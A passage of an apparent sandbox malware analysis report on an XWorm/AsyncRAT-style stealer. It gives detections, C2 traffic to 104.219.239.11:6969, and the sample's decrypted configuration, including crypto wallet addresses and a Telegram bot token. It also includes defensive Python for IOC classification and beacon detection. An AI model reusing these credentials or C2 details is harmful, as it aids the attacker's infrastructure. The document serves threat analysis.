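        groups[(r["sid"], r["src_ip"], r["dst_ip"], r["dst_port"])].append(r["timestamp"])
    report = {}
    for key, stamps in groups.items():
        stamps.sort()
        deltas = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(deltas) < 2:
            report[key] = {"count": len(stamps), "period": None, "jitter": None,
                           "verdict": "insufficient"}
            continue
        period, jitter = mean(deltas), pstdev(deltas)
        if max(deltas) < min_period:
            verdict = "burst"
        elif period >= min_period and period > 0 and jitter / period <= max_cv:
            verdict = "beacon"
        else:
            verdict = "irregular"
        report[key] = {"count": len(stamps), "period": period, "jitter": jitter,
                       "verdict": verdict}
    return report


if __name__ == "__main__":
    for key, s in beacon_stats(load_rows(SAMPLE_ROWS)).items():
        print(key, s)
```

Run over the full alert list (or over Suricata's eve.json converted to the same columns) and the 30 s inbound cadence from 104.219.239.11:6969 is the signal a periodicity detection should key on; the sub-second SID 2852873 burst is a different pattern and is reported separately rather than mistaken for a beacon.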

                        AV Detection

Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Avira: detection malicious, Label: TR/Spy.Gen
Source: C:\Users\user\Documents\OneDrive.exe | ReversingLabs: Detection: 55%
Source: b39wW3jYKO.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Documents\OneDrive.exe | Joe Sandbox ML: detected
Source: b39wW3jYKO.exe | Joe Sandbox ML: detected
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: 104.219.239.11
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: 6969
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: <123456789>
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: <Xwormmm>
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: NEW
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: USB.exe
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: %AppData%
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: OneDrive.exe
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: bc1q4en48gkr2a0yqjdtp2sw5x0l6tam0wk276puvr
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: 0x3B6faE0078a049EA7829711330E040CF8298ae57
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: TN9bbwK3RTX7XhwqH1uDT7TPWmjPM8zKKm
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: 5372344229:AAEM46DF5hWBLPbN5UErJaoJvlNvm-ZJXyg
Source: 9.0.arndry.exe.1d0000.0.unpack | String decryptor: @Buddyv2bot
Source: b39wW3jYKO.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: b39wW3jYKO.exe, b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Configuration.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdbSHA256}Lq source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb0 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: protobuf-net.pdb source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdbH source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.pdb8e source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbP4 source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Management.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.ni.pdb source: WER31B8.tmp.dmp.12.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER31B8.tmp.dmp.12.dr
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\SYSTEM32\MSVFW32.dll
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.mui
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.mui
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | File opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.mui
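The String decryptor entries above are the sample's decrypted configuration: a C2 host and port, two bracketed tokens, file and path names, three cryptocurrency wallet addresses (the kind a clipboard-hijacking module would swap in) and Telegram bot details. The Python below is an added example, not the report's or the sample's code: it classifies each decrypted string by shape with regular expressions, pairs the host with the port that follows it, and groups the wallet addresses by chain, giving a structured IOC list ready for a blocklist or a clipboard-hijack hunt. The input strings are copied from this report except the Telegram bot token, which is replaced by a constructed placeholder of the same shape; the category names, regexes and the host-followed-by-port pairing rule are this example's own assumptions.

```python
"""Classify decrypted configuration strings into IOC categories.

Added example, not code from the Joe Sandbox report or from the sample.
Input strings are copied from the report's "String decryptor" lines, except the
Telegram bot token, which is a constructed placeholder of the same shape.
"""
import re
from collections import defaultdict

DECRYPTED_STRINGS = [
    "104.219.239.11",
    "6969",
    "<123456789>",
    "<Xwormmm>",
    "NEW",
    "USB.exe",
    "%AppData%",
    "OneDrive.exe",
    "bc1q4en48gkr2a0yqjdtp2sw5x0l6tam0wk276puvr",
    "0x3B6faE0078a049EA7829711330E040CF8298ae57",
    "TN9bbwK3RTX7XhwqH1uDT7TPWmjPM8zKKm",
    "1234567890:" + "A" * 35,   # constructed placeholder, not the real token
    "@Buddyv2bot",
]

# Ordered (category, regex) pairs; the first match wins. Character classes follow
# the address encodings: bech32 (no 1, b, i, o), hex, base58 (no 0, O, I, l).
PATTERNS = [
    ("ipv4", re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")),
    ("btc_bech32", re.compile(r"^bc1[02-9ac-hj-np-z]{39,59}$")),
    ("eth", re.compile(r"^0x[0-9a-fA-F]{40}$")),
    ("tron", re.compile(r"^T[1-9A-HJ-NP-Za-km-z]{33}$")),
    ("telegram_bot_token", re.compile(r"^\d{8,10}:[A-Za-z0-9_-]{35}$")),
    ("telegram_handle", re.compile(r"^@[A-Za-z0-9_]{5,32}$")),
    ("bracketed_token", re.compile(r"^<[^<>]+>$")),
    ("env_path", re.compile(r"^%[^%]+%$")),
    ("filename", re.compile(r"^[\w.-]+\.exe$", re.IGNORECASE)),
]


def classify(s):
    """Return the IOC category of one decrypted string ('other' if no shape matches)."""
    for name, rx in PATTERNS:
        if rx.match(s):
            return name
    if s.isdigit() and 1 <= int(s) <= 65535:
        return "port"
    return "other"


def classify_all(strings):
    """Group strings by category, preserving the order in which they were decrypted."""
    groups = defaultdict(list)
    for s in strings:
        groups[classify(s)].append(s)
    return dict(groups)


def c2_endpoints(strings):
    """Pair each IPv4 address with the port string that directly follows it (host:port)."""
    out = []
    for a, b in zip(strings, strings[1:]):
        if classify(a) == "ipv4" and classify(b) == "port":
            out.append(f"{a}:{b}")
    return out


def wallet_addresses(strings):
    """Wallet addresses by chain; an empty list where the config has none."""
    groups = classify_all(strings)
    return {chain: groups.get(chain, []) for chain in ("btc_bech32", "eth", "tron")}


if __name__ == "__main__":
    for category, items in classify_all(DECRYPTED_STRINGS).items():
        print(f"{category:20s} {items}")
    print("C2:", c2_endpoints(DECRYPTED_STRINGS))
    print("wallets:", wallet_addresses(DECRYPTED_STRINGS))
```

The shape checks are deliberately strict (full-string anchors, encoding-specific alphabets) so a stray decrypted string such as NEW or a bracketed token never lands in an address bucket; anything unrecognised is kept under other rather than dropped, so the analyst still sees it.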

                        Networking

Source: Network traffic | Suricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
Source: Network traffic | Suricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 104.219.239.11:6969 -> 192.168.2.6:49809
Source: Network traffic | Suricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49841 -> 104.219.239.11:6969
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49841 -> 104.219.239.11:6969
Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 104.219.239.11:6969 -> 192.168.2.6:49809
Source: Network traffic | Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49809 -> 104.219.239.11:6969
Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 104.219.239.11:6969 -> 192.168.2.6:49809
Source: Network traffic | Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49809 -> 104.219.239.11:6969
Source: Yara match | File source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED
Source: global traffic | TCP traffic: 192.168.2.6:49809 -> 104.219.239.11:6969
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View | ASN Name: TUT-ASUS TUT-ASUS
Source: Joe Sandbox View | ASN Name: DATAWAGONUS DATAWAGONUS
Source: unknown | DNS query: name: ip-api.com
Source: unknown | TCP traffic detected without corresponding DNS query: 104.219.239.11 (50 connections; the report lists each as a separate hit)
Source: global traffic | DNS traffic detected: DNS query: ip-api.com
Source: powershell.exe, 00000002.00000002.2330216159.000001949CC1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000002.00000002.2330216159.000001949CC1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micft.cMicRosof
Source: arndry.exe, 00000009.00000002.2501821797.000000000244A000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.0000000002454000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000243C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: arndry.exe, 00000009.00000002.2499722879.000000000065C000.00000004.00000020.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.dr | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2291460980.0000019484891000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000243C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Amcache.hve.12.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000002.00000002.2291460980.0000019484891000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.dr | String found in binary or memory: https://api.telegram.org/bot
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000002.00000002.2291460980.0000019484AB8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2657598951.0000019A37398000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                        Source: powershell.exe, 00000002.00000002.2319507770.00000194948FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2653178477.0000019A26F9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                        Source: OneDrive.exe, 00000008.00000002.2581561823.0000012969141000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2590105516.0000012971900000.00000004.08000000.00040000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2581561823.00000129695E2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                        Source: tmpE9CD.tmp.dat.0.dr, tmp8A2A.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: b39wW3jYKO.exe, 00000000.00000002.4636065933.000001419265B000.00000004.00000800.00020000.00000000.sdmp, places.raw.0.dr, tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org#
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                        Source: tmpBE60.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                        Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: arndry.exe.0.dr, XLogger.cs | .Net Code: KeyboardLayout

System Summary

Source: 0.2.b39wW3jYKO.exe.1419b110000.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: 0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: 9.0.arndry.exe.1d0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.b39wW3jYKO.exe.1419c0e0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing artifacts associated with disabling Windows Defender Author: ditekSHen
Source: 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 00000000.00000002.4636065933.000001419257D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\arndry.exe, type: DROPPED | Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_000001419AFB6E5B
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347F57AD
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD347F9C90
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34929108
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34929108
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34B7E5E4
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34B78E0D
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34B7DDD1
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34B7A745
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34B70379
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5854A
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E59496
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E5059F
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E50400
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E4ABB4
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E59503
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E59650
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E52DFA
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E505E0
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E52FC5
Source: C:\Users\user\Desktop\b39wW3jYKO.exe | Code function: 0_2_00007FFD34E532C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD346656EA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34665BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34666FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD347330E9
Source: C:\Users\user\Documents\OneDrive.exe | Code function: 8_2_00007FFD348157AD
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD346820A1
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD346812E9
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34685DD6
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34686B82
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34680F1D
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34681329
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34680E28
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Code function: 9_2_00007FFD34681E0D
Source: C:\Users\user\Documents\OneDrive.exe | Code function: 14_2_00007FFD348057AD
Source: C:\Users\user\AppData\Local\Temp\arndry.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632
Source: OneDrive.exe.0.dr | Static PE information: No import functions for PE file found
Source: b39wW3jYKO.exe | Static PE information: No import functions for PE file found
Source: b39wW3jYKO.exe | Binary or memory string: OriginalFilename vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe, 00000000.00000002.4644423945.000001419AC09000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameOneDrive.exe4 vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe, 00000000.00000002.4651442435.000001419C0E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameRecovery.dll2 vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe, 00000000.00000002.4646804706.000001419AFB0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe, 00000000.00000002.4648202553.000001419B070000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOneDrive.exe4 vs b39wW3jYKO.exe
Source: b39wW3jYKO.exe, 00000000.00000002.4648624073.000001419B110000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameOptions.dll0 vs b39wW3jYKO.exe
